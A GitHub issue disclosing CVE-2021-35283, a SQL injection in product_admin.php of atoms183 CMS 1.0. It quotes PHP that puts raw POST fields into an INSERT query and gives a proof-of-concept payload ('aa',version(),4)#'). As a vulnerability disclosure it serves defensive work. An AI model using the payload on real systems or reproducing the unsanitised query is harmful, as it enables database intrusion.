Headline
CVE-2021-35283: product_ Admin.php SQL injection · Issue #1 · atoms183/CMS
SQL Injection vulnerability in product_admin.php in atoms183 CMS 1.0, allows attackers to execute arbitrary commands via the Name, Fname, and ID parameters to search.php.
product_ Admin.php
There is SQL injection in line 23
$link=mysql_connect($host,$user,$pass);
mysql_select_db($db_name,$link);
//Если переменная Name передана
if (isset($_POST["Name"])) {
//Тут идет запрос
$sql = mysql_query("INSERT INTO `info` (`Name`, `Fname`, `ID`)
VALUES ('".$_POST['Name']."','".$_POST['Fname']."','".$_POST['ID']."')");
//Успех
if ($sql) {
echo "<p>Ваши данные успешно добавлены.</p>";
} else {
echo "<p>Произошла ошибка.</p>";
}
}
?>
Just submit the following post request
Name=aa’,version(),4)#
search.php
post : query=a